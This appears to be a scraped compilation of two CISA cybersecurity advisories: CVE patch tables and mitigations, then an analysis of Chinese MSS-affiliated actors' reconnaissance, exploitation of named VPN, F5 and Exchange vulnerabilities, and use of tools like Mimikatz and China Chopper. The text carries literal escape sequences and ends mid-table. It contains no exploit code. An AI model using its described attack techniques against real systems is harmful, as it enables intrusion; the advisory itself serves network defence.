[CVE-2019-0803](<https://nvd.nist.gov/vuln/detail/CVE-2019-0803>) | Windows 10 for 32-bit Systems<br>Windows 10 for x64-based Systems<br>Windows 10 Version 1607 for 32-bit Systems<br>Windows 10 Version 1607 for x64-based Systems<br>Windows 10 Version 1703 for 32-bit Systems<br>Windows 10 Version 1703 for x64-based Systems<br>Windows 10 Version 1709 for 32-bit Systems<br>Windows 10 Version 1709 for ARM64-based Systems<br>Windows 10 Version 1709 for x64-based Systems<br>Windows 10 Version 1803 for 32-bit Systems<br>Windows 10 Version 1803 for ARM64-based Systems<br>Windows 10 Version 1803 for x64-based Systems<br>Windows 10 Version 1809 for 32-bit Systems<br>Windows 10 Version 1809 for ARM64-based Systems<br>Windows 10 Version 1809 for x64-based Systems<br>Windows 7 for 32-bit Systems Service Pack 1<br>Windows 7 for x64-based Systems Service Pack 1<br>Windows 8.1 for 32-bit systems<br>Windows 8.1 for x64-based systems<br>Windows RT 8.1<br>Windows Server 2008 for 32-bit Systems Service Pack 2<br>Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)<br>Windows Server 2008 for Itanium-Based Systems Service Pack 2<br>Windows Server 2008 for x64-based Systems Service Pack<br>Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)<br>Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1<br>Windows Server 2008 R2 for x64-based Systems Service Pack 1<br>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)<br>Windows Server 2012<br>Windows Server 2012 (Server Core installation)<br>Windows Server 2012 R2<br>Windows Server 2012 R2 (Server Core installation)<br>Windows Server 2016<br>Windows Server 2016 (Server Core installation)<br>Windows Server 2019<br>Windows Server 2019 (Server Core installation)<br>Windows Server, version 1803 (Server Core Installation) | [Microsoft Security Advisory for CVE-2019-0803](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0803>)
[CVE-2017-6327](<https://nvd.nist.gov/vuln/detail/CVE-2017-6327>) | Symantec Messaging Gateway before 10.6.3-267 | [Broadcom Security Updates Detail for CVE-2017-6327 and CVE-2017-6328](<https://www.broadcom.com/support/security-center/securityupdates/detail?fid=security_advisory&pvid=security_advisory&year=&suid=20170810_00>)
[CVE-2020-3118](<https://nvd.nist.gov/vuln/detail/CVE-2020-3118>) | ASR 9000 Series Aggregation Services Routers<br>Carrier Routing System (CRS)<br>IOS XRv 9000 Router<br>Network Convergence System (NCS) 540 Series Routers<br>NCS 560 Series Routers<br>NCS 1000 Series Routers<br>NCS 5000 Series Routers<br>NCS 5500 Series Routers<br>NCS 6000 Series Routers | [Cisco Security Advisory cisco-sa-20200205-iosxr-cdp-rce](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200205-iosxr-cdp-rce>)
[CVE-2020-8515](<https://nvd.nist.gov/vuln/detail/CVE-2020-8515>) | DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices | [DrayTek Security Advisory: Vigor3900 / Vigor2960 / Vigor300B Router Web Management Page Vulnerability (CVE-2020-8515)](<https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-\(cve-2020-8515\)/>)

 2. **Implement rigorous configuration management programs.** Audit configuration management programs to ensure they can track and mitigate emerging threats. Review system configurations for misconfigurations and security weaknesses. Implementing a robust configuration and patch management program hinders sophisticated APT operations by limiting the effectiveness of opportunistic attacks.

 3. **Disable unnecessary ports, protocols, and services.** Review network security device logs and determine whether to shut off unnecessary ports and protocols. Monitor common ports and protocols for C2 activity. Turn off or disable any unnecessary services or functionality within devices (e.g., universal plug and play [UPnP], PowerShell).

 4. **Enhance monitoring of network and email traffic.** Review network signatures and indicators for focused operations activities, monitor for new phishing themes, and adjust email rules accordingly. Follow best practices of restricting attachments via email. Ensure that log information is aggregated and correlated to enable maximum detection capabilities, with a focus on monitoring for account misuse.

 5. **Use protection capabilities to stop malicious activity.** Implement antivirus software and other endpoint protection capabilities to automatically detect and prevent malicious files from executing. Use network intrusion detection and prevention systems to identify and prevent commonly employed adversarial malware and limit nefarious data transfers.

### Contact Information

CISA encourages recipients of this report to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at:

 * 1-888-282-0870 (From outside the United States: +1-703-235-8832)
 * [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>) (UNCLASS)

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams.
Reporting forms can be found on the CISA homepage at <http://www.us-cert.cisa.gov/>.

### References

[[1] White House Publication: How China’s Economic Aggression Threatens the Technologies and Intellectual Property of the United States and the World](<https://www.whitehouse.gov/wp-content/uploads/2018/06/FINAL-China-Technology-Report-6.18.18-PDF.pdf>)

[[2] Congressional Research Services: 'Made in China 2025' Industrial Policies: Issues for Congress](<https://fas.org/sgp/crs/row/IF10964.pdf>)

[[3] Council on Foreign Relations: Is ‘Made in China 2025’ a Threat to Global Trade](<https://www.cfr.org/backgrounder/made-china-2025-threat-global-trade>)

[[4] Mandiant: APT1 Exposing One of China’s Cyber Espionage Units](<https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf>)

[[5] U.S. Department of Justice (DOJ) Press Release: U.S. Charges Five Chinese Military Hackers for Cyber Espionage Against U.S. Corporations and a Labor Organization for Commercial Advantage](<https://www.justice.gov/opa/pr/us-charges-five-chinese-military-hackers-cyber-espionage-against-us-corporations-and-labor>)

[[6] CISA Alert TA17-117A: Intrusions Affecting Multiple Victims Across Multiple Sectors](<https://us-cert.cisa.gov/ncas/alerts/TA17-117A>)

[[7] DOJ Press Release: Deputy Attorney General Rod J. Rosenstein Announces Charges Against Chinese Hackers](<https://www.justice.gov/opa/speech/deputy-attorney-general-rod-j-rosenstein-announces-charges-against-chinese-hackers>)

[[8] CISA Awareness Briefing: Chinese Cyber Activity Targeting Managed Service Providers](<https://us-cert.cisa.gov/sites/default/files/publications/Chinese-Cyber-Activity-Targeting-Managed-Service-Providers.pdf>)

[[9] DOJ Press Release: Deputy Attorney General William P. Barr Announces Indictment of Four Members of China’s Military for Hacking into Equifax](<https://www.justice.gov/opa/speech/attorney-general-william-p-barr-announces-indictment-four-members-china-s-military>)

[[10] CISA Press Release: FBI and CISA Warn Against Chinese Targeting of COVID-19 Research Organizations](<https://www.cisa.gov/news/2020/05/13/fbi-and-cisa-warn-against-chinese-targeting-covid-19-research-organizations>)

[[11] CISA Alert AA20-126A: APT Groups Target Healthcare and Essential Services](<https://us-cert.cisa.gov/ncas/alerts/AA20126A>)

[[12] CISA Current Activity (CA): Chinese Malicious Cyber Activity](<https://us-cert.cisa.gov/ncas/current-activity/2020/08/03/chinese-malicious-cyber-activity>)

[[13] FireEye Advanced Persistent Threat Groups](<https://www.fireeye.com/current-threats/apt-groups.html>)

[[14] MITRE ATT&CK: APT3](<https://attack.mitre.org/groups/G0022/>)

[[15] MITRE ATT&CK: APT19](<https://attack.mitre.org/groups/G0073/>)

[[16] MITRE ATT&CK: APT41](<https://attack.mitre.org/groups/G0096/>)

[[17] CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)

[[18] CISA Alert AA20-020A: Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP](<https://us-cert.cisa.gov/ncas/alerts/aa20-020a>)

[[19] CISA CA: F5 Releases Security Advisory for BIG-IP TMUI RCE Vulnerability, CVE-2020-5902](<https://us-cert.cisa.gov/ncas/current-activity/2020/07/04/f5-releases-security-advisory-big-ip-tmui-rce-vulnerability-cve>)

[[20] CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)

[[21] NSA Advisory: Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>)

### Revisions

 * October 1, 2020: Initial Version
 * October 20, 2020: Recommended Actions Section Updated

Advisory AA20-275A, “Potential for China Cyber Response to Heightened U.S.–China Tensions”, published 2020-10-20 (modified 2020-10-20): <https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-275a>

### Summary

The Cybersecurity and Infrastructure Security Agency (CISA) has consistently observed Chinese Ministry of State Security (MSS)-affiliated cyber threat actors using publicly available information sources and common, well-known tactics, techniques, and procedures (TTPs) to target U.S. Government agencies. CISA has observed these—and other threat actors with varying degrees of skill—routinely using open-source information to plan and execute cyber operations. CISA leveraged the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) and Pre-ATT&CK frameworks to characterize the TTPs used by Chinese MSS-affiliated actors. This product was written by CISA with contributions by the Federal Bureau of Investigation (FBI).

### Key Takeaways

 * Chinese MSS-affiliated cyber threat actors use open-source information to plan and conduct cyber operations.
 * Chinese MSS-affiliated cyber threat actors use readily available exploits and exploit toolkits to quickly engage target networks.
 * Maintaining a rigorous patching cycle continues to be the best defense against the most frequently used attacks.
 * If critical vulnerabilities remain unpatched, cyber threat actors can carry out attacks without the need to develop custom malware and exploits or use previously unknown vulnerabilities to target a network.
 * This Advisory identifies some of the more common—yet most effective—TTPs employed by cyber threat actors, including Chinese MSS-affiliated cyber threat actors.

[Click here](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-258A-Chinese_Ministry_of_State_Security-Affiliated_Cyber_Threat_Actor_Activity_S508C.pdf>) for a PDF version of this report.

### Technical Details

Through the operation of the National Cybersecurity Protection System (NCPS) and by fulfilling its mission as the national risk advisor, CISA has observed Chinese MSS-affiliated cyber threat actors operating from the People’s Republic of China using commercially available information sources and
open-source exploitation tools to target U.S. Government agency networks.\n\nAccording to a recent U.S. Department of Justice indictment, MSS-affiliated actors have targeted various industries across the United States and other countries\u2014including high-tech manufacturing; medical device, civil, and industrial engineering; business, educational, and gaming software; solar energy; pharmaceuticals; and defense\u2014in a campaign that lasted over ten years.[[1](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)] These hackers acted for both their own personal gain and the benefit of the Chinese MSS.[[2](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)]\n\nAccording to the indictment,\n\n_To conceal the theft of information from victim networks and otherwise evade detection, the defendants typically packaged victim data in encrypted Roshal Archive Compressed files (RAR files), changed RAR file and victim documents\u2019 names and extensions (e.g., from \u201c.rar\u201d to \u201c.jpg\u201d) and system timestamps, and concealed programs and documents at innocuous-seeming locations on victim networks and in victim networks\u2019 \u201crecycle bins.\u201d The defendants frequently returned to re-victimize companies, government entities, and organizations from which they had previously stolen data, in some cases years after the initial successful data theft. In several instances, however, the defendants were unsuccessful in this regard, due to the efforts of the FBI and network defenders._\n\nThe continued use of open-source tools by Chinese MSS-affiliated cyber threat actors highlights that adversaries can use relatively low-complexity capabilities to identify and exploit target networks. 
In most cases, cyber operations are successful because misconfigurations and immature patch management programs allow actors to plan and execute attacks using existing vulnerabilities and known exploits. Widespread implementation of robust configuration and patch management programs would greatly increase network security. It would also reduce the speed and frequency of opportunistic attacks by forcing threat actors to dedicate time and funding to research unknown vulnerabilities and develop custom exploitation tools.\n\n### MITRE PRE-ATT&CK\u00ae Framework for Analysis\n\nIn the last 12 months, CISA analysts have routinely observed Chinese MSS-affiliated actors using the following PRE-ATT&CK\u00ae Framework TTPs.\n\n#### Target Selection and Technical Information Gathering\n\n_Target Selection_ [[TA0014](<https://attack.mitre.org/versions/v7/tactics/TA0014/>)] is a critical part of cyber operations. While cyber threat actors\u2019 motivations and intents are often unknown, they often make their selections based on the target network\u2019s security posture. Threat actors can use information sources such as Shodan, the Common Vulnerabilities and Exposures (CVE) database, and the National Vulnerability Database (NVD).[[3](<https://www.shodan.io/>)][[4](<https://cve.mitre.org/>)][[5](<https://nvd.nist.gov/>)]\n\n * Shodan is an internet search engine that can be used to identify vulnerable devices connected to the internet. Shodan queries can also be customized to discover specific vulnerabilities on devices, which enables sophisticated cyber threat actors to use relatively unsophisticated techniques to execute opportunistic attacks on susceptible targets.\n * The CVE database and the NVD contain detailed information about vulnerabilities in applications, appliances, and operating systems that can be exploited by cyber threat actors if they remain unpatched. 
These sources also provide risk assessments if any of the recorded vulnerabilities are successfully exploited.\n\nThese information sources have legitimate uses for network defense. CISA analysts are able to identify Federal Government systems that may be susceptible to exploitation attempts by using Shodan, the CVE database, and the NVD to enrich NCPS information. Unlike threat actors, CISA takes the necessary actions to notify network owners of their exposure in order to prevent an impending intrusion or quickly identify intrusions as they occur.\n\nWhile using these data sources, CISA analysts have observed a correlation between the public release of a vulnerability and targeted scanning of systems identified as being vulnerable. This correlation suggests that cyber threat actors also rely on Shodan, the CVE database, the NVD, and other open-source information to identify targets of opportunity and plan cyber operations. Together, these data sources provide users with the understanding of a specific vulnerability, as well as a list of systems that may be vulnerable to attempted exploits. These information sources therefore contain invaluable information that can lead cyber threat actors to implement highly effective attacks.\n\nCISA has observed Chinese MSS-affiliated actors using the techniques in table 1 to gather technical information to enable cyber operations against Federal Government networks (_Technical Information Gathering_ [[TA0015](<https://attack.mitre.org/versions/v7/tactics/TA0015/>)]).\n\n_Table 1: Technical information gathering techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1245](<https://attack.mitre.org/versions/v7/techniques/T1245/>)\n\n| \n\nDetermine Approach/Attack Vector\n\n| \n\nThe threat actors narrowed the attack vectors to relatively recent vulnerability disclosures with open-source exploits. 
\n \n[T1247](<https://attack.mitre.org/versions/v7/techniques/T1247/>)\n\n| \n\nAcquire Open Source Intelligence (OSINT) Data Sets and Information\n\n| \n\nCISA observed activity from network proxy service Internet Protocol (IP) addresses to three Federal Government webpages. This activity appeared to enable information gathering activities. \n \n[T1254](<https://attack.mitre.org/versions/v7/techniques/T1254/>)\n\n| \n\nConduct Active Scanning\n\n| \n\nCISA analysts reviewed the network activity of known threat actor IP addresses and found evidence of reconnaissance activity involving virtual security devices. \n \n#### Technical Weakness Identification\n\nCISA analysts consistently observe targeting, scanning, and probing of significant vulnerabilities within days of their emergence and disclosure. This targeting, scanning, and probing frequently leads to compromises at the hands of sophisticated cyber threat actors. In some cases, cyber threat actors have used the same vulnerabilities to compromise multiple organizations across many sectors. Organizations do not appear to be mitigating known vulnerabilities as quickly as cyber threat actors are exploiting them. CISA recently released an alert that highlighted the top 10 vulnerabilities routinely exploited by sophisticated foreign cyber threat actors from 2016 to 2019.[[6](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a%20>)]\n\nAdditionally, table 2 provides a list of notable compromises by Chinese MSS-affiliated actors within the past 12 months.\n\n_Table 2: Significant CVEs targeted by Chinese MSS-affiliated actors in the last 12 months_\n\nVulnerability\n\n| \n\nObservations \n \n---|--- \n \nCVE-2020-5902: F5 Big-IP Vulnerability\n\n| \n\nCISA has conducted incident response engagements at Federal Government and commercial entities where the threat actors exploited CVE-2020-5902. 
This is a vulnerability in F5\u2019s Big-IP Traffic Management User Interface that allows cyber threat actors to execute arbitrary system commands, create or delete files, disable services, and/or execute Java code.[[7](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a%20>)] \n \nCVE-2019-19781: Citrix Virtual Private Network (VPN) Appliances\n\n| \n\nCISA has observed the threat actors attempting to discover vulnerable Citrix VPN Appliances. CVE-2019-19781 enabled the actors to execute directory traversal attacks.[[8](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a%20>)] \n \nCVE-2019-11510: Pulse Secure VPN Servers\n\n| \n\nCISA has conducted multiple incident response engagements at Federal Government and commercial entities where the threat actors exploited CVE-2019-11510\u2014an arbitrary file reading vulnerability affecting Pulse Secure VPN appliances\u2014to gain access to victim networks. Although Pulse Secure released patches for CVE-2019-11510 in April 2019, CISA observed incidents where compromised Active Directory credentials were used months after the victim organization patched their VPN appliance.[[9](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a%20%20>)] \n \nCVE-2020-0688: Microsoft Exchange Server\n\n| \n\nCISA has observed the actors exploiting CVE-2020-0688 for remote code execution to enable email collection of targeted networks. \n \nAdditionally, CISA has observed Chinese MSS-affiliated actors using the techniques listed in table 3 to identify technical weaknesses in Federal Government networks (_Technical Weakness Identification _[[TA0018](<https://attack.mitre.org/versions/v7/tactics/TA0018/>)]). 
\n\n_Table 3: Technical weakness identification techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1288](<https://attack.mitre.org/versions/v7/techniques/T1288/>)\n\n| \n\nAnalyze Architecture and Configuration Posture\n\n| \n\nCISA observed the cyber actors scanning a Federal Government agency for vulnerable web servers. CISA also observed the threat actors scanning for network appliances vulnerable to CVE-2019-11510. \n \n[T1291](<https://attack.mitre.org/versions/v7/techniques/T1291/>)\n\n| \n\nResearch Relevant Vulnerabilities\n\n| \n\nCISA has observed the threat actors conducting scanning and reconnaissance of Federal Government internet-facing systems shortly after the disclosure of significant CVEs. \n \n#### Build Capabilities \n\nCISA analysts have observed cyber threat actors using command and control (C2) infrastructure as part of their cyber operations. These observations also provide evidence that threat actors can build and maintain relatively low-complexity capabilities, such as C2, to enable cyber operations against Federal Government networks (_Build Capabilities _[[TA0024](<https://attack.mitre.org/versions/v7/tactics/TA0024/>)]). CISA has observed Chinese MSS-affiliated actors using the build capabilities summarized in table 4.\n\n_Table 4: Build capabilities observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1352](<https://attack.mitre.org/versions/v7/techniques/T1352/>)\n\n| \n\nC2 Protocol Development\n\n| \n\nCISA observed beaconing from a Federal Government entity to the threat actors\u2019 C2 server. \n \n[T1328](<https://attack.mitre.org/versions/v7/techniques/T1328/>)\n\n| \n\nBuy Domain Name\n\n| \n\nCISA has observed the use of domains purchased by the threat actors. 
\n \n[T1329](<https://attack.mitre.org/versions/v7/techniques/T1329/>)\n\n| \n\nAcquire and / or use of 3rd Party Infrastructure\n\n| \n\nCISA has observed the threat actors using virtual private servers to conduct cyber operations. \n \n[T1346](<https://attack.mitre.org/versions/v7/techniques/T1346>)\n\n| \n\nObtain/Re-use Payloads\n\n| \n\nCISA has observed the threat actors use and reuse existing capabilities. \n \n[T1349](<https://attack.mitre.org/versions/v7/techniques/T1349>)\n\n| \n\nBuild or Acquire Exploit\n\n| \n\nCISA has observed the threat actors using a variety of open-source and publicly available exploits and exploit code to compromise Federal Government networks. \n \n### MITRE ATT&CK Framework for Analysis\n\nCISA has observed sophisticated cyber threat actors, including Chinese MSS-affiliated actors, using commercial and open-source tools to conduct their operations. For example, threat actors often leverage internet software repositories such as GitHub and Exploit-DB.[[10](<https://www.GitHub.com%20>)][[11](<https://exploit-db.com%20>)] Both repositories are commonly used for legitimate development and penetration testing and developing open-source code, but cyber threat actors can also use them to find code to enable nefarious actions.\n\nDuring incident response activities, CISA frequently observed Chinese government-affiliated actors using the open-source tools outlined in table 5.\n\n_Table 5: Common exploit tools CISA observed used by Chinese MSS-affiliated actors_\n\nTool\n\n| \n\nObservations \n \n---|--- \n \n[Cobalt Strike](<https://attack.mitre.org/versions/v7/software/S0154/>)\n\n| \n\nCISA has observed the threat actors using Cobalt Strike to target commercial and Federal Government networks. Cobalt Strike is a commercial penetration testing tool used to conduct red team operations. 
It contains a number of tools that complement the cyber threat actor\u2019s exploitation efforts, such as a keystroke logger, file injection capability, and network services scanners. CISA observed connections from a Federal Government agency to multiple IP addresses possibly hosting Cobalt Strike team servers. \n \n[China Chopper Web Shell](<https://attack.mitre.org/versions/v7/software/S0020/>)\n\n| \n\nCISA has observed the actors successfully deploying China Chopper against organizations\u2019 networks. This open-source tool can be downloaded from internet software repositories such as GitHub and Exploit-DB. China Chopper is a web shell hosted on a web server. It is mainly used for web application attacks, and it is configured in a client/server relationship. China Chopper contains security scanners and can be used to upload files and brute-force passwords. \n \n[Mimikatz](<https://attack.mitre.org/versions/v7/software/S0002/>)\n\n| \n\nCISA has observed the actors using Mimikatz during their operations. 
This open-source tool is used to capture account credentials and perform privilege escalation with pass-the-hash attacks that allow an attacker to pass captured password hashes and authenticate to network devices.[[12](<https://www.varonis.com/blog/what-is-mimikatz/%20>)] \n \nThe following sections list the ATT&CK Framework TTPs routinely employed by Chinese government-affiliated actors to conduct cyber operations as observed by CISA analysts.\n\n#### Initial Access \n\nIn the last 12 months, CISA has observed Chinese MSS-affiliated actors use spearphishing emails with embedded links to actor-owned infrastructure and, in some cases, compromise or poison legitimate sites to enable cyber operations.\n\nCISA has observed the threat actors using the _Initial Access_ [[TA0001](<https://attack.mitre.org/versions/v7/tactics/TA0001/>)] techniques identified in table 6.\n\n_Table 6: Initial access techniques observed by CISA_\n\n**MITRE ID**\n\n| \n\n**Name**\n\n| \n\n**Observation** \n \n---|---|--- \n \n[T1204.001](<https://attack.mitre.org/versions/v7/techniques/T1204/001/>)\n\n| \n\nUser Execution: Malicious Link\n\n| \n\nCISA has observed indications that users have clicked malicious links embedded in spearphishing emails that the threat actors sent \n \n[T1566.002](<https://attack.mitre.org/versions/v7/techniques/T1566/002>)\n\n| \n\nPhishing: Spearphishing Link\n\n| \n\nCISA analyzed network activity of a Federal Government entity and concluded that the threat actors sent a malicious email weaponized with links. \n \n[T1190](<https://attack.mitre.org/versions/v7/techniques/T1190>)\n\n| \n\nExploit Public-Facing Application\n\n| \n\nCISA has observed the actors leveraging CVE-2019-19781 to compromise Citrix Application Delivery Controllers. 
\n \nCyber threat actors can continue to successfully launch these types of low-complexity attacks\u2014as long as misconfigurations in operational environments and immature patch management programs remain in place\u2014by taking advantage of common vulnerabilities and using readily available exploits and information.\n\n#### Execution \n\nCISA analysts continue to observe beaconing activity indicative of compromise or ongoing access to Federal Government networks. This beaconing is a result of cyber threat actors successfully completing cyber operations that are often designed around emergent vulnerabilities and reliant on existing exploitation tools, as mentioned in this document.\n\nCISA has observed Chinese MSS-affiliated actors using the _Execution _[[TA0002](<https://attack.mitre.org/versions/v7/tactics/TA0002/>)] technique identified in table 7.\n\n_Table 7: Execution technique observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1072](<https://attack.mitre.org/versions/v7/techniques/T1072>)\n\n| \n\nSoftware Deployment Tools\n\n| \n\nCISA observed activity from a Federal Government IP address beaconing out to the threat actors\u2019 C2 server, which is usually an indication of compromise. \n \n#### Credential Access \n\nCyber threat actors also continue to identify large repositories of credentials that are available on the internet to enable brute-force attacks. While this sort of activity is not a direct result of the exploitation of emergent vulnerabilities, it demonstrates that cyber threat actors can effectively use available open-source information to accomplish their goals. 
Further, a threat actor does not require a high degree of competence or sophistication to successfully carry out this kind of opportunistic attack.\n\nCISA has observed Chinese MSS-affiliated actors using the _Credential Access_ [[TA0006](<https://attack.mitre.org/versions/v7/tactics/TA0006/>)] techniques highlighted in table 8.\n\n_Table 8: Credential access techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1003.001](<https://attack.mitre.org/versions/v7/techniques/T1003/001/>)\n\n| \n\nOperating System (OS) Credential Dumping: Local Security Authority Subsystem Service (LSASS) Memory\n\n| \n\nCISA observed the threat actors using Mimikatz in conjunction with coin miner protocols and software. The actors used Mimikatz to dump credentials from the OS using a variety of capabilities resident within the tool. \n \n[T1110.004](<https://attack.mitre.org/versions/v7/techniques/T1110/004>)\n\n| \n\nBrute Force: Credential Stuffing\n\n| \n\nCISA observed what was likely a brute-force attack of a Remote Desktop Protocol on a public-facing server. \n \n#### Discovery \n\nAs with any cyber operation, cyber threat actors must be able to confirm that their target is online and vulnerable\u2014there are a multitude of open-source scanning and reconnaissance tools available to them to use for this purpose. CISA consistently observes scanning activity across federal agencies that is indicative of discovery techniques. 
CISA has observed Chinese MSS-affiliated actors scanning Federal Government traffic using the discovery technique highlighted in table 9 (_Discovery_ [[TA0007](<https://attack.mitre.org/versions/v7/tactics/TA0007/>)]).\n\n_Table 9: Discovery technique observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1046](<https://attack.mitre.org/versions/v7/techniques/T1046/>)\n\n| \n\nNetwork Service Scanning\n\n| \n\nCISA has observed suspicious network scanning activity for various ports at Federal Government entities. \n \n#### Collection \n\nWithin weeks of public disclosure of CVE-2020-0688, CISA analysts identified traffic that was indicative of Chinese MSS-affiliated threat actors attempting to exploit this vulnerability using the _Collection_ [[TA0009](<https://attack.mitre.org/versions/v7/tactics/TA0009/>)] technique listed in table 10.\n\n_Table 10: Collection technique observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1114](<https://attack.mitre.org/versions/v7/techniques/T1114>)\n\n| \n\nEmail Collection\n\n| \n\nCISA observed the actors targeting CVE-2020-0688 to collect emails from the Exchange servers found in Federal Government environments. \n \n#### Command and Control \n\nCISA analysts often observe cyber threat actors using external proxy tools or hop points to enable their cyber operations while remaining anonymous. These proxy tools may be commercially available infrastructure as a service (IaaS) or software as a service (SaaS) in the form of a web browser promising anonymity on the internet. For example, \u201cThe Onion Router\u201d (Tor) is often used by cyber threat actors for anonymity and C2. Actors carefully choose proxy tools depending on their intended use. 
These techniques are relatively low in complexity and enabled by commercially available tools, yet they are highly effective and often reliant upon existing vulnerabilities and readily available exploits.\n\nCISA has observed Chinese MSS-affiliated actors using the _Command and Control_ [[TA0011](<https://attack.mitre.org/versions/v7/tactics/TA0011/>)] techniques listed in table 11.\n\n_Table 11: Command and control techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1090.002](<https://attack.mitre.org/versions/v7/techniques/T1090/002>)\n\n| \n\nProxy: External Proxy\n\n| \n\nCISA observed activity from a network proxy tool to 221 unique Federal Government agency IP addresses. \n \n[T1090.003](<https://attack.mitre.org/versions/v7/techniques/T1090/003>)\n\n| \n\nProxy: Multi-hop Proxy\n\n| \n\nCISA observed activity from Tor that has resulted in confirmed compromises of internet-facing Federal Government agency systems. \n \n[T1573.002](<https://attack.mitre.org/versions/v7/techniques/T1573/002>)\n\n| \n\nEncrypted Channel: Asymmetric Cryptography\n\n| \n\nCISA observed activity from Tor that has resulted in confirmed compromises of internet-facing Federal Government agency systems. \n \n### Mitigations\n\nCISA asserts with high confidence that sophisticated cyber threat actors will continue to use open-source resources and tools to target networks with a low security posture. When sophisticated cyber threat actors conduct operations against soft targets, it can negatively impact critical infrastructure and federal, state, local, tribal, and territorial government networks, possibly resulting in loss of critical data or personally identifiable information.\n\nCISA and the FBI recommend that organizations place an increased priority on patching the vulnerabilities routinely exploited by MSS-affiliated cyber actors. See table 12 for patch information on the CVEs mentioned in this report. 
For more information on vulnerabilities routinely exploited by sophisticated cyber actors, see [CISA Alert: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>).\n\n_Table 12: Patch Information for Vulnerabilities Routinely Exploited by MSS-affiliated Cyber Actors_\n\nVulnerability\n\n| \n\nVulnerable Products\n\n| \n\nPatch Information \n \n---|---|--- \n \n[CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)\n\n| \n\n * Big-IP devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT)\n\n| \n\n * [F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>) \n \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n\n| \n\n * Citrix Application Delivery Controller\n\n * Citrix Gateway\n\n * Citrix SDWAN WANOP\n\n| \n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n\n * [Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) \n \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\n| \n\n * Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15\n\n * Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 
